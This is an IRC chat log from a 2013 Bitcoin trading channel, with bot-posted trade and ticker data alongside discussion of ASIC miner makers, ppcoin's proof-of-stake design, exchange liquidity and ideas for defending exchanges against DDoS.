havelockers will not stand for no divs! Mar 29 22:14:32 hehe Mar 29 22:14:50 arbitrage Mar 29 22:14:58 been getting a lot of push requests lately Mar 29 22:15:06 people buying on mpex and selling on havelock Mar 29 22:15:19 [BTCTC] [PAJKA.BOND] 1 @ 0.1075 BTC [+] Mar 29 22:15:46 mpex has been hanging above .0037 for days no? Mar 29 22:16:18 ;;eauth Mar 29 22:16:19 (eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. Mar 29 22:18:47 [MPEX] [S.DICE] 3200 @ 0.0037 = 11.84 BTC [-] Mar 29 22:18:49 [MPEX] [S.DICE] 2000 @ 0.003615 = 7.23 BTC [-] Mar 29 22:18:50 [MPEX] [S.DICE] 1512 @ 0.00361 = 5.4583 BTC [-] Mar 29 22:18:54 [MPEX] [S.DICE] 1000 @ 0.003601 = 3.601 BTC [-] Mar 29 22:18:56 [MPEX] [S.DICE] 1000 @ 0.00360001 = 3.6 BTC [-] Mar 29 22:21:12 based on the idea that asic devices will eventually start shipping, does anyone have an estimate on how much extra hashing power is likely to come online within the next few months? Mar 29 22:22:46 $vwap dice Mar 29 22:22:48 smickles: S.DICE 1 day: average: 0.00396702 high: 0.00419995 low: 0.00360001 volume: 31375 btc: 124.46532743 7 day: average: 0.00339187 high: 0.0045 low: 0.0031 volume: 678237 btc: 2300.4892668 30 day: average: 0.00453418 high: 0.0063799 low: 0.00300001 volume: 1714919 btc: 7775.7474019 Mar 29 22:23:14 ;;ticker h sdice Mar 29 22:23:20 ! Mar 29 22:23:24 lol yea Mar 29 22:23:28 !ticker h sdice Mar 29 22:23:29 [HAVELOCK:SDICE] 1D: 0.35000000 / 0.40726766 / 0.46500000 (265 shares, 107.92593120 BTC), 7D: 0.35000000 / 0.46365078 / 0.53000000 (1486 shares, 688.98505175 BTC), 30D: 0.35000000 / 0.51934247 / 0.68950000 (5763 shares, 2992.97064753 BTC) Mar 29 22:23:38 !ticker mp s.dice Mar 29 22:23:39 [MPEX:S.DICE] 1D: 0.00360001 / 0.00396702 / 0.00419995 (31375 shares, 124.47 BTC), 7D: 0.0031 / 0.00339186 / 0.0045 (678237 shares, 2,300.49 BTC), 30D: 0.00300001 / 0.00453417 / 0.0063799 (1714919 shares, 7,775.75 BTC) Mar 29 22:24:04 not bad for havelock having 10% of the shares Mar 29 22:27:39 you mean 1% ;) Mar 29 22:28:36 well 10% of the shares that are actually trading on mpex Mar 29 22:28:46 more than 1% of the toal Mar 29 22:28:48 1.3% ! Mar 29 22:30:22 [MPEX] [S.DICE] 1784 @ 0.00337335 = 6.0181 BTC [-] Mar 29 22:33:26 [MPEX] [S.MPOE] 17200 @ 0.00068081 = 11.7099 BTC [-] Mar 29 22:33:28 [MPEX] [S.MPOE] 32150 @ 0.00067177 = 21.5974 BTC [-] Mar 29 22:35:12 what's the deal with gox allowing you to put in orders that exceed your balance? Mar 29 22:35:42 pgp: bugpowderr seems to know more about it, but basically, they let you do it Mar 29 22:35:49 $vwap mpoe Mar 29 22:35:51 smickles: S.MPOE 1 day: average: 0.00067061 high: 0.00068314 low: 0.0006357 volume: 604261 btc: 405.22276531 7 day: average: 0.00066388 high: 0.00071369 low: 0.0006 volume: 2226197 btc: 1477.93072672 30 day: average: 0.00073286 high: 0.00078628 low: 0.0006 volume: 17354585 btc: 12718.4554152 Mar 29 22:36:28 so, concievable much of the order book dept could be totally bogus Mar 29 22:36:50 [BTCTC] [ASICMINER-PT] 14 @ 0.7514 = 10.5196 BTC [+] Mar 29 22:36:52 bugpowderr seems to think it isnt Mar 29 22:36:52 [BTCTC] [ASICMINER-PT] 10 @ 0.7513 = 7.513 BTC [-] Mar 29 22:37:09 [BTCTC] [ASICMINER-PT] 1 @ 0.7511 BTC [-] Mar 29 22:37:26 [BTCTC] [ASICMINER-PT] 1 @ 0.751 BTC [-] Mar 29 22:37:28 [BTCTC] [COGNITIVE] 40 @ 0.131 = 5.24 BTC [-] Mar 29 22:37:30 [BTCTC] [ASICMINER-PT] 2 @ 0.75 = 1.5 BTC [-] Mar 29 22:37:32 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Mar 29 22:37:33 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Mar 29 22:37:37 pgp all orders that display in the book are fully funded Mar 29 22:37:58 [BTCTC] [ASICMINER-PT] 4 @ 0.745 = 2.98 BTC [-] Mar 29 22:38:02 you can place additional orders, but they will be listed as 'insufficient funds' and will not show on the book. Mar 29 22:38:10 topace : https://bitcointalk.org/index.php?topic=101902.msg1700294#msg1700294 Mar 29 22:38:31 got it... Mar 29 22:38:43 They will appear on the book if you add additional funds Mar 29 22:39:08 for example, if you are waiting for funds to clear, but you want to go to sleep, you can place the order and go to sleep Mar 29 22:39:20 when funds clear it will automatically hit the book Mar 29 22:40:45 well this is fun https://bitcointalk.org/index.php?topic=160527.0;topicseen Mar 29 22:42:37 bleh Mar 29 22:42:44 so much text and screenshots Mar 29 22:46:27 kakobrekla: it's like daytime television. Mar 29 22:47:09 heh so bfl now has a working asic, but its using too much power Mar 29 22:47:13 funny Mar 29 22:47:21 it's probably catching fire Mar 29 22:47:31 what Mar 29 22:47:34 sauce? Mar 29 22:47:35 they subcontracted to boeing... Mar 29 22:47:39 does this mean bfl will putoff releasing the asics until they get power under control ? Mar 29 22:48:02 ;;bc,24hprc Mar 29 22:48:03 86.09 Mar 29 22:48:17 We've been tracking down a power issue these last few days and have it isolated to a few key systems. In the interest of time, we are planning on potentially scaling back units hashing speed as required to accommodate the extra power and shipping multiple units to those that want their units right now. If would would prefer to wait for a unit after we've made some changes to the systems that need a bit of tweaking, we will be happy to put your sh Mar 29 22:48:17 ipment on hold. However, if you'd rather have the units right now at an increased power usage, we will ship you as many units as required to get you to the hashrate your purchased, if we end up having to scale back any given class of unit to fit within the power envelope of the current board design. Mar 29 22:48:17 Mar 29 22:48:24 [BTCTC] [PAJKA.BOND] 10 @ 0.09 = 0.9 BTC [-] Mar 29 22:48:32 !ticker m s.mpoe Mar 29 22:48:33 [MPEX:S.MPOE] 1D: 0.0006357 / 0.0006706 / 0.00068314 (604261 shares, 405.22 BTC), 7D: 0.0006 / 0.00066388 / 0.00071369 (2226197 shares, 1,477.93 BTC), 30D: 0.0006 / 0.00073285 / 0.00078628 (17354585 shares, 12,718.46 BTC) Mar 29 22:48:39 [BTCTC] [PAJKA.BOND] 10 @ 0.1001 = 1.001 BTC [+] Mar 29 22:48:41 ahahahahaha Mar 29 22:48:54 mircea_popescu: you are my bitcoin hero Mar 29 22:48:58 dawwnn of battle, bears, CHARGE Mar 29 22:49:09 ;;ticker Mar 29 22:50:22 oh no gribble is down Mar 29 22:54:10 gonna be a fun weekend Mar 29 22:55:21 bugpowderr - any predictions? Mar 29 22:56:53 ;;goxlag Mar 29 22:56:53 0 seconds Mar 29 22:57:58 [HAVELOCK] [VTX] 2 @ 0.479 = 0.958 BTC [+] Mar 29 23:01:02 [BTCTC] [GSDPT] 10 @ 0.004087 = 0.0409 BTC [+] Mar 29 23:01:07 [BTCTC] [GSDPT] 20 @ 0.00409 = 0.0818 BTC [+] Mar 29 23:01:10 [BTCTC] [GSDPT] 2 @ 0.004113 = 0.0082 BTC [+] Mar 29 23:01:38 [MPEX] [S.MPOE] 36569 @ 0.00067177 = 24.566 BTC [-] Mar 29 23:01:40 [MPEX] [S.MPOE] 13381 @ 0.00067955 = 9.0931 BTC [+] Mar 29 23:06:34 of all the stupid bs forum drama Mar 29 23:06:38 that avalon thing... Mar 29 23:09:17 http://i.imgur.com/Wq5jpqx.jpg Mar 29 23:11:58 lots of drama Mar 29 23:12:44 to all those people saying btc isn't backed by anything...it's backed by drama Mar 29 23:13:00 it's a 1849 style gold rush in ASICs right now Mar 29 23:13:18 yep and i think avalon is the clear winner so far Mar 29 23:13:28 pickaxes Mar 29 23:13:28 makes people craxy Mar 29 23:13:51 the bitbet BFL decision will be fun to watch Mar 29 23:14:11 those pickaxes have gone up in value ALOT since they wre pre-ordered... Mar 29 23:14:22 yep Mar 29 23:14:28 ebay list many of them at 1000% of MSRP Mar 29 23:15:18 think they sold out batch 3 in under an hour...thats 600 x 80 btc AT LEAST for a total of 24000 btc Mar 29 23:15:43 how many TH in batch 3? Mar 29 23:15:52 ;;calc 24000*88 Mar 29 23:15:53 2112000 Mar 29 23:16:06 not a bad sale i would say Mar 29 23:16:20 i think batch 3 was 600 units at 66gh each Mar 29 23:16:24 minimum Mar 29 23:16:32 you could order the 88gh version Mar 29 23:16:34 1/3 at 86 imo Mar 29 23:16:41 *88 Mar 29 23:16:56 yep Mar 29 23:17:11 so...200 * 88 and 400 * 66 Mar 29 23:17:17 ;;calc 66*400 Mar 29 23:17:17 26400 Mar 29 23:17:31 ;;calc 88*200 Mar 29 23:17:31 17600 Mar 29 23:17:53 ;;calc 26400+17600 Mar 29 23:17:53 44000 Mar 29 23:17:55 ;;calc 17600+26400 /1000 Mar 29 23:17:55 17626.4 Mar 29 23:18:01 44 TH Mar 29 23:18:06 http://mineforeman.com/2013/03/04/more-avalon-asic-miners-delivered/ Mar 29 23:18:33 say that batch 1 and 2 ws a total of 60 TH - 100% of current network hash rate Mar 29 23:18:34 ;;diff Mar 29 23:18:54 pgp: i don't think it would be that much Mar 29 23:18:59 the largest batch was batch 3 Mar 29 23:19:04 and that is a total of 44 TH Mar 29 23:19:09 batch 2 was half the size Mar 29 23:19:14 300 units Mar 29 23:19:29 any shipping date for #3 ? Mar 29 23:19:37 last i saw they pushed back Mar 29 23:19:45 batch 2 is just getting delivered now Mar 29 23:19:58 amazing story ! Mar 29 23:20:03 and i THINK, but i may be completely wrong, that may 15th is target delivery date for batch 3 Mar 29 23:20:36 Yifu wrote something about that but I can't find the link Mar 29 23:20:53 still before than BFL imo :) Mar 29 23:21:15 ;;ticker Mar 29 23:21:31 laaaag Mar 29 23:21:36 error4733: yeah Mar 29 23:21:39 ;;goxlag Mar 29 23:21:39 0 seconds Mar 29 23:21:44 BFL keeps saying, oh tomorrow Mar 29 23:22:07 avalon got it, they understood what it takes to get the product to market Mar 29 23:22:21 AND understood that being first was more important Mar 29 23:22:27 i guess you read that : http://www.reddit.com/r/Bitcoin/comments/1b8hvt/bfl_josh_updates_on_asic_status_full_transcript/ Mar 29 23:22:31 they used 110nm process Mar 29 23:22:36 instead of 45nm Mar 29 23:22:48 [BTCTC] [S.DICE-PT] 20 @ 0.00459 = 0.0918 BTC [+] Mar 29 23:22:56 so BFL's stated design may be a better product Mar 29 23:23:07 but so far it is nonexistent Mar 29 23:23:18 Yeah need to ship to stay in the game Mar 29 23:23:40 my response on the issue of flash IPOs and Early Bird priced IPOs: https://bitcointalk.org/index.php?topic=146611.msg1701638#msg1701638 Mar 29 23:23:43 sometimes worse is better Mar 29 23:23:44 just another example of management trumping design specs or programming knowledge Mar 29 23:23:56 !ticker m s.dice Mar 29 23:23:57 [MPEX:S.DICE] 1D: 0.00337335 / 0.00393508 / 0.00419995 (33159 shares, 130.48 BTC), 7D: 0.0031 / 0.0033864 / 0.0045 (675670 shares, 2,288.09 BTC), 30D: 0.00300001 / 0.00453297 / 0.0063799 (1716703 shares, 7,781.77 BTC) Mar 29 23:24:03 MJR, i always read yifu never thinks he can succes to be first Mar 29 23:24:11 i know Mar 29 23:24:20 he was trying to stave off monopoly by BFL Mar 29 23:24:21 [BTCTC] [S.DICE-PT] 1 @ 0.00494 BTC [+] Mar 29 23:24:22 so, 110nm Mar 29 23:24:29 yes Mar 29 23:24:37 just so there would be diversification in the market Mar 29 23:24:39 was not a strategic choise for time Mar 29 23:24:47 well...he could have waited Mar 29 23:24:50 just more easy & cheaper Mar 29 23:24:54 and prob done a smaller process Mar 29 23:24:58 EXACTLY Mar 29 23:24:59 he just got it done Mar 29 23:25:03 cheaper and quicker Mar 29 23:25:09 and it works and is being delivered Mar 29 23:25:17 he want do the same with tablet Mar 29 23:25:23 I think he felt pressure to keep up with BFL Mar 29 23:25:29 but was just way better at execution than they were Mar 29 23:25:35 [MPEX] [S.MPOE] 29500 @ 0.0006713 = 19.8034 BTC [-] Mar 29 23:25:37 [MPEX] [S.MPOE] 13450 @ 0.00066822 = 8.9876 BTC [-] Mar 29 23:25:45 fuck Mar 29 23:25:54 that was a lot of shares Mar 29 23:26:16 someone thinks there won't be much of a dividend i guess Mar 29 23:26:22 [BTCTC] [ASICMINER-PT] 1 @ 0.7295 BTC [-] Mar 29 23:26:38 i still think in this big money business, should be easy to give 50K$ in china to fuck up a concurrent Mar 29 23:27:03 for 6 month Mar 29 23:27:50 change a little setting in any part of the process and you get 6 more month delay Mar 29 23:27:59 true Mar 29 23:28:07 *tinfoil hat* Mar 29 23:28:12 think its possible but unlikely Mar 29 23:28:28 in this specific case, there were only 3 real contenders Mar 29 23:28:57 so weird Mar 29 23:29:07 mt.gox is laggier than bitcoinity.org Mar 29 23:33:04 error4733: i hope that the tablet works Mar 29 23:33:57 i think that one thing is becoming clear, from kickstarter projects and bitcoin projects, creating a cool website is not the same thing as creating a viable business Mar 29 23:33:58 makomk malaimo maximian midnightmagic MiningBuddy mircea_popescu MJR_ MJR_III mpexbot Mar 29 23:33:59 makomk malaimo maximian midnightmagic MiningBuddy mircea_popescu MJR_ MJR_III mpexbot Mar 29 23:34:04 MJR_III better hosting :p Mar 29 23:34:14 http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/#c480 Mar 29 23:34:18 mircea_popescu: hehehe Mar 29 23:34:18 is this troll? Mar 29 23:34:37 must be Mar 29 23:34:57 i wouldnt be suprised if it wasnt Mar 29 23:34:58 but the main difference between web based ideas and the other businesses is interaction with the real world Mar 29 23:35:37 everyone focuses on CEO/CTO in this space...but COO is where you really shine Mar 29 23:36:13 word., Mar 29 23:38:27 mircea_popescu: i wasn't aware that you did web hosting, but I saw the little hosted by mpex on bitcoinity Mar 29 23:42:54 [MPEX] [S.MPOE] 3850 @ 0.00066822 = 2.5726 BTC [-] Mar 29 23:42:55 [MPEX] [S.MPOE] 14850 @ 0.00066587 = 9.8882 BTC [-] Mar 29 23:42:56 [MPEX] [S.MPOE] 1600 @ 0.00066529 = 1.0645 BTC [-] Mar 29 23:44:58 [HAVELOCK] [VTX] 2 @ 0.479 = 0.958 BTC [+] Mar 29 23:46:10 lol, just got an email Mar 29 23:46:30 mtgox will be depreciated on apr 10 due to legal issues Mar 29 23:46:43 wait what? Mar 29 23:46:44 *mtgoxusd/cad codes Mar 29 23:46:59 yeah those will be deprecated i had heard Mar 29 23:47:29 huh? Mar 29 23:47:53 they can't use gox coupons Mar 29 23:48:31 [MPEX] [S.MPOE] 1000 @ 0.00067955 = 0.6796 BTC [+] Mar 29 23:51:58 [HAVELOCK] [VTX] 5 @ 0.479 = 2.395 BTC [+] Mar 29 23:52:58 [HAVELOCK] [VTX] 1 @ 0.479 BTC [+] Mar 29 23:53:55 here we go Mar 29 23:53:57 It has begun Mar 29 23:54:05 I got my bid in at 76.2222 Mar 29 23:54:58 [HAVELOCK] [SDICE] 1 @ 0.41999996 BTC [+] Mar 29 23:54:59 [HAVELOCK] [SDICE] 1 @ 0.41999997 BTC [+] Mar 29 23:55:00 [HAVELOCK] [SDICE] 5 @ 0.41999998 = 2.1 BTC [+] Mar 29 23:55:02 yep... Mar 29 23:55:02 [HAVELOCK] [SDICE] 1 @ 0.41999999 BTC [+] Mar 29 23:55:06 what happens to gox accounts once "depreciated" Mar 29 23:55:07 i'm in at 80 Mar 29 23:55:16 KRS1: he meant deprecated Mar 29 23:55:17 2500 just went off Mar 29 23:55:34 ;;bids 0 Mar 29 23:55:38 you just won't be able to withdraw USD via Mt. Gox USD codes i think Mar 29 23:56:49 [BTCTC] [ASICMINER-PT] 1 @ 0.739 BTC [+] Mar 29 23:56:55 [BTCTC] [ASICMINER-PT] 2 @ 0.740995 = 1.482 BTC [+] Mar 29 23:57:00 [BTCTC] [ASICMINER-PT] 1 @ 0.741 BTC [+] Mar 29 23:57:02 oh my bad thanks Mar 29 23:57:13 i'm looking into the exact details Mar 29 23:58:58 [HAVELOCK] [SDICE] 50 @ 0.42 = 21 BTC [+] Mar 30 00:00:09 ;;ticker Mar 30 00:05:58 [HAVELOCK] [VTX] 1 @ 0.479 BTC [+] Mar 30 00:06:18 $oix Mar 30 00:06:29 !ticker ^oix Mar 30 00:06:29 Hell, ain't we about more fucked than a whore at closin' time, huh? Mar 30 00:06:35 !ticker m ^oix Mar 30 00:06:36 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 66.95953589 / 85.06143152 / 85.06556611 (111084 shares, 22,108.25 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 30 00:07:22 MJR_III i don't really. Mar 30 00:07:38 https://bitcointalk.org/index.php?topic=80312.1080 Mar 30 00:07:44 ;;ticker Mar 30 00:07:49 lol@assbot Mar 30 00:08:09 is that his warning Mar 30 00:08:09 /join #chef Mar 30 00:10:09 mircea_popescu: gribble is down Mar 30 00:10:16 ;;gribble Mar 30 00:10:16 yes I am gribble. why do you keep bothering me? Mar 30 00:10:22 ;;asks Mar 30 00:10:24 lolk Mar 30 00:10:44 mircea_popescu you are working some magic... Mar 30 00:11:13 sometimes I wonder who actually has more power, people like you, or the blokes at the bank... Mar 30 00:11:13 ;;calc 1+1 Mar 30 00:11:13 2 Mar 30 00:11:23 gribble is working... Mar 30 00:12:17 i has no powar Mar 30 00:13:09 bitfinex is down i think Mar 30 00:16:01 ya know, i don't recall bitcoinica going down as often as ya'll say bitfinex goes down Mar 30 00:16:15 'coinica really only went down once Mar 30 00:16:28 its back up Mar 30 00:16:36 i think it has to do with the cloudflare anti-dddos Mar 30 00:19:05 so i just came from meeting about btc alternatives Mar 30 00:19:15 that changed into ppcoin sales pitch Mar 30 00:19:18 jurov: alt chains? Mar 30 00:19:25 yes Mar 30 00:19:56 jurov: what's so good about ppcoin? Mar 30 00:20:14 bitcoin is too power hungry, ppcoin is more ecological Mar 30 00:20:26 orly Mar 30 00:21:03 you've lost me there Mar 30 00:21:17 plus we received stern warning that moeny is not morally nutral Mar 30 00:21:21 if you find something that uses less power, more people will mine Mar 30 00:21:22 *neutral Mar 30 00:21:35 driving difficulty up further and using the same power Mar 30 00:21:55 so if we become suddenly rich, we shoudl thin about the outcome of our actions Mar 30 00:22:05 and ppcoin is not using difficulty Mar 30 00:22:22 interesting Mar 30 00:22:34 everyone who has enough coins*time can have a right to issue a block Mar 30 00:22:59 but it's not in effect yet, its mining normally until some time passes Mar 30 00:24:55 for now i'm reserving my judgement, maybe buying some just in case Mar 30 00:26:31 while i rate all other cryptocurrencies chances as around 1% might be worth it to hold a basket of all of them, just in case Mar 30 00:26:58 no upper limit on ppcoin amounts either Mar 30 00:28:08 that was mentioned too that he considers inflation as consequence of 2nd thermodynamic law and thus it should be allowed Mar 30 00:28:16 i feel like the proof-of-stake bit turns it into a game, get 51% of the coins and you win Mar 30 00:28:49 no, someone with older coins than you can issue blocks instead Mar 30 00:29:23 you have to wait with your 51% to get the right Mar 30 00:29:32 after receiving them Mar 30 00:29:43 but, wouldn't that mean they have to do nothing w/ their coins to maintain Mar 30 00:29:50 I would love to short ripple Mar 30 00:30:14 yes, if you spend the coins, you lower your weight Mar 30 00:30:45 this actually would be motivation to hoard, hence inflation is necessary Mar 30 00:30:53 so, if someone gets anywhere near 50%, then people have to stop spending coins to protect it Mar 30 00:31:20 lol Mar 30 00:31:51 while it may be an interesting and novel approach Mar 30 00:32:05 as with all the others i doubt it will gain the momentum it needs Mar 30 00:32:23 lol Mar 30 00:32:45 if someone gets anywhere near 50% *he* has to wait to be able to pull 51% attack, meanwhile others mine blocks and lower his part Mar 30 00:32:50 it would need to have a signifigant advantage Mar 30 00:33:00 take many massive loans, get near 50%, the claim you can't pay because you have to protect the network! Mar 30 00:33:18 you *can* pay Mar 30 00:33:30 but you can't use them as a proof of stake tomine Mar 30 00:33:42 bugpowder: what's stopping you? Mar 30 00:33:42 cuz all ur coins are new and shiiny Mar 30 00:33:59 in some ways this ruins the fungibility of the money though Mar 30 00:34:03 all coins are not equal Mar 30 00:34:04 and only older coins can be used as proof of stake to mine Mar 30 00:34:39 well, actually i heard about it today first time, that's how i understood it Mar 30 00:34:57 i just finished reading their white paper Mar 30 00:35:01 where can I short ripple? Mar 30 00:35:13 bugpowder: just find someone willing to lend you some Mar 30 00:35:25 and all btc coins aren't equal too, as anyone who tried to spend new satoshidice outputs can attest Mar 30 00:35:55 jurov: because they haven't been verified yet? Mar 30 00:36:20 no cause they dusted Mar 30 00:36:21 een after they were verified, satoshi client defaults to higer txfee Mar 30 00:36:29 you have to wait Mar 30 00:36:36 oh Mar 30 00:36:49 aside from that dusted consideration Mar 30 00:38:15 oh, here was that blog with the mining profit plots Mar 30 00:38:16 http://organofcorti.blogspot.com Mar 30 00:39:15 anyway my peeve with them altcoins is they all use outdated satoshi codebase Mar 30 00:39:28 both litecoin and ppcoin are based on 0.6 Mar 30 00:40:00 while bitcoind was quite much refactored in 0.7/0.8 versions Mar 30 00:40:24 causing simple merging impossible Mar 30 00:40:52 and boy, they are thrashy... Mar 30 00:43:55 thats the good part. Mar 30 00:44:29 ya really Mar 30 00:44:38 yope. Mar 30 00:44:57 O_o Mar 30 00:45:30 bitcoin is *not* ready to replace any amount of worldwide economy. we do need experiments/forks at this stage Mar 30 00:46:07 but we also need someone to do it properly Mar 30 00:47:04 yea, these poor silkroad dealers you mentioned yest. let's remember them with moment of silence. Mar 30 00:48:08 what happened to the sr dealers? Mar 30 00:48:08 that will change as price increases Mar 30 00:48:33 tiberiusiv because it is too risky to keep big amounts on exchanges Mar 30 00:49:57 You can move about 0.5MM pretty easily Mar 30 00:50:08 and that's actually good, it slows the rally while we accrue some real competency (by tial and error, but hopefully still) Mar 30 00:50:16 huh? Mar 30 00:50:21 people buy that all the time Mar 30 00:50:38 0.5MM? Mar 30 00:50:56 need credible exchange Mar 30 00:50:58 like if there were millions going in and out, that wouldn't cause wild swings? Mar 30 00:50:58 [HAVELOCK] [SDICE] 1 @ 0.41999999 BTC [-] Mar 30 00:51:20 single 1MM gox orders have been going off once a day for the past 2 weeks Mar 30 00:51:39 there is a 1.5MM bid at 76 right now Mar 30 00:51:45 the swings are from goxlag Mar 30 00:51:49 nonsense. if all 10m bitcoins were on mtgox's ask side Mar 30 00:51:53 yes it is Mar 30 00:51:56 true which is around 30 seconds now Mar 30 00:51:58 I saw it go up Mar 30 00:52:00 ;;goxlag Mar 30 00:52:01 36.499108 seconds Mar 30 00:52:15 then 1m USD would still move the price considerably Mar 30 00:52:53 so? don't clamor for impossible them. Mar 30 00:52:57 *then Mar 30 00:52:59 a 1M buy right now moves the price 5% Mar 30 00:53:12 if you hit it all at once Mar 30 00:53:20 instead of dribble Mar 30 00:53:36 I bet a 1MM bid moves any midcap stock at least as much Mar 30 00:53:55 no Mar 30 00:54:11 tiberiusiv so how do you propose to get instantly into 1trillion mkt cap? Mar 30 00:54:19 so you can have your beloved liquidity? Mar 30 00:54:29 hahaha Mar 30 00:54:41 it's necessary condition Mar 30 00:54:47 [MPEX] [S.MPOE] 9700 @ 0.00067039 = 6.5028 BTC [-] Mar 30 00:54:49 [MPEX] [S.MPOE] 2718 @ 0.00066531 = 1.8083 BTC [-] Mar 30 00:54:54 one of necessary conditions Mar 30 00:55:05 bp - your right about comparing to trading in midcap stocks Mar 30 00:56:13 the same can be said of companies that ipo Mar 30 00:56:32 often they float <10% of there shares and often aren't that liquid Mar 30 00:57:19 mt gox makes it a closed system to a certain extent Mar 30 01:00:55 i'd argue that fiat is "overliquid" since it has inflated supply so you have too high expectations Mar 30 01:01:14 bitcoin is scarce, not easy to just lend 10k block Mar 30 01:01:18 from central bank Mar 30 01:01:29 and use it to trade Mar 30 01:01:32 [BTCTC] [B.YABMC] 1 @ 0.014 BTC [+] Mar 30 01:01:58 but where you can take it from? someone will lend it to you Mar 30 01:02:21 this isn't so easy with btc.. jus lend it on moment;s notice Mar 30 01:02:57 tiberiusiv, all that "volume" and "liuquidity" on irl fin markets is thanks to leverage Mar 30 01:03:01 agree or not? Mar 30 01:03:37 and there were crashes every now and then Mar 30 01:03:56 and panics Mar 30 01:04:02 like we have now in btc Mar 30 01:04:16 yes, and i do ask, where is the liquidity from? Mar 30 01:04:23 from leverage, i say. Mar 30 01:04:32 [BTCTC] [BASIC-MINING] 1 @ 0.37 BTC [+] Mar 30 01:04:56 leverage and credit lines are the key to liquidity in modern financial markets Mar 30 01:05:08 gold covered money was not either. $1m could really create panic at its time Mar 30 01:06:36 this is fiat at the moment Mar 30 01:07:12 ugh i can't trade like this Mar 30 01:07:21 how so? they are printing and loaning it out in hopes some greater fool will come and eat all the debt Mar 30 01:07:50 tiberiusiv don't change the topic Mar 30 01:08:05 lalalalala Mar 30 01:08:33 you obvoisly aren't trying to understand what i'm saying :/ Mar 30 01:08:56 what i told in last 50 lines? Mar 30 01:09:40 obviously if you aren't even replying to my point Mar 30 01:09:48 jurov: he is not interested in your points, he will always change topics once you have proven him wrong yet again... Mar 30 01:10:01 ^^^ this Mar 30 01:10:14 i ignored him long ago...i wish everyone else would Mar 30 01:10:37 i know how tempting it can be to show someone who is obviuosly wrong how and where they are wrong...but i couldn't get sucked into that trap any more Mar 30 01:10:56 he is banking on you getting invested in trying to show him the intelligent way of looking at things Mar 30 01:11:06 he'll devolve into ad hominem, and any other logical fallacy Mar 30 01:11:10 i know. but it's useful for me to try and explain, too, even if he isn't listening Mar 30 01:11:15 good point Mar 30 01:11:21 i at least enjoyed reading your points Mar 30 01:11:32 Is there a relatively conventional futures market in btc? Mar 30 01:11:58 [HAVELOCK] [SDICE] 2 @ 0.41999999 = 0.84 BTC [-] Mar 30 01:15:02 so? you want to pump and dump and can't? Mar 30 01:15:49 and it can get you more if ye weren't inept and bought mpoe options with these 12k in meantime Mar 30 01:16:30 they are most liquid instrument there is Mar 30 01:16:59 ;;bc,24hprc Mar 30 01:17:01 88.81 Mar 30 01:17:23 dude they are just covered by tens of thousands of btc. Mar 30 01:17:40 cue talking shit about mircea_popescu Mar 30 01:18:01 i can't see what he wrote but i'm guessing gypsy something Mar 30 01:18:05 yea btc is illiquid hence everything is shit lalalalala Mar 30 01:18:07 mp is just a greasy wanabe pimp Mar 30 01:18:16 ooh thats new Mar 30 01:18:26 love that he can still surprise me Mar 30 01:18:32 tiberiusiv: np :D Mar 30 01:18:46 this is actually fun Mar 30 01:18:58 [HAVELOCK] [SDICE] 72 @ 0.41 = 29.52 BTC [-] Mar 30 01:18:58 guessing his arguments from watching half the convo Mar 30 01:19:15 how many people has he called poor? over/under 3 Mar 30 01:19:21 tiberiusiv nobody here agrees with you. so you must have indeed better understanding :) Mar 30 01:19:36 downpressure is stronger than ever Mar 30 01:19:47 no i'm mere sockpuppet Mar 30 01:21:01 so we finally arrived at name calling :D Mar 30 01:21:36 seems i did convince you as well Mar 30 01:22:52 granted, i did convince them first :) Mar 30 01:23:35 yes? what did he try to sell you? Mar 30 01:24:13 and how do you know for example iDiffs i'm selling aren't overvalued trash? Mar 30 01:25:42 and you have obsession with undoing someone, i see :) Mar 30 01:26:15 oh seems talking to self mode activated Mar 30 01:26:32 [MPEX] [S.MPOE] 21636 @ 0.00067234 = 14.5467 BTC [+] Mar 30 01:26:34 [MPEX] [S.MPOE] 5000 @ 0.00067326 = 3.3663 BTC [+] Mar 30 01:26:37 sorry to disrupt your thought processes Mar 30 01:26:38 [MPEX] [S.MPOE] 15664 @ 0.00067327 = 10.5461 BTC [+] Mar 30 01:26:43 what've you got against psycopaths? Mar 30 01:26:56 lol Mar 30 01:27:02 have we arrived at this point already? Mar 30 01:27:11 psycopaths are usually productive members of society Mar 30 01:27:35 yea, especially sociopaths are among the most productive Mar 30 01:27:49 they say a lot of ceo's are sociopaths Mar 30 01:28:11 i dunno about that, seems kinda off-handed remarkish Mar 30 01:29:06 yeah, its more of an urban legend i suppose Mar 30 01:30:01 i can't trade at all right now, bitfinex is fucked Mar 30 01:30:23 MJR_III: what do you want to trade? Mar 30 01:30:33 not sure...maybe just short at 92 Mar 30 01:30:40 try to get out around 88 Mar 30 01:31:13 its mostly for fun on my bitfinex account, i usually just lend out the money, but interest rates have dropped, so i am actively trading the account to try and grow it a bit Mar 30 01:31:16 wow, you picked a winner of a site do trade on Mar 30 01:31:32 lol, only margin trading platform really Mar 30 01:31:39 as far as i know Mar 30 01:32:04 icbit works better than this place Mar 30 01:32:14 i was wondering though, and maybe mircea_popescu has some experience, but what if you used some sort of system to break up the channel of info Mar 30 01:32:21 like have orders on a certain port Mar 30 01:32:26 data on a different one Mar 30 01:32:31 and none of them are 80 Mar 30 01:32:57 or if you had a vpn session or something Mar 30 01:32:57 what would be the point? Mar 30 01:33:03 avoid ddos Mar 30 01:33:21 i bet they could direct ddos at any port Mar 30 01:33:21 i wonder if you could create a fix engine in a web browser Mar 30 01:33:32 i'm sure they could smickles Mar 30 01:33:40 hence you have to have a valid logon Mar 30 01:33:52 and then your trading session goes across that Mar 30 01:33:56 you'd still have to negotiate the logon Mar 30 01:34:02 true Mar 30 01:34:16 hmmm Mar 30 01:34:25 i just had another idea...but not sure if it would work Mar 30 01:34:39 you know how yubikey or any of those authenticators work? Mar 30 01:34:48 what if you used that for port based connection Mar 30 01:35:14 only registered customers could connect cuz they know what port to connect on Mar 30 01:35:37 obfuscation is not protection Mar 30 01:35:48 eventually, that port would be known Mar 30 01:35:54 if not right away Mar 30 01:35:54 i'd use ssl certificate Mar 30 01:36:20 no, the port constantly changes Mar 30 01:36:24 every 20 seconds Mar 30 01:36:29 with some ddos protection that supports 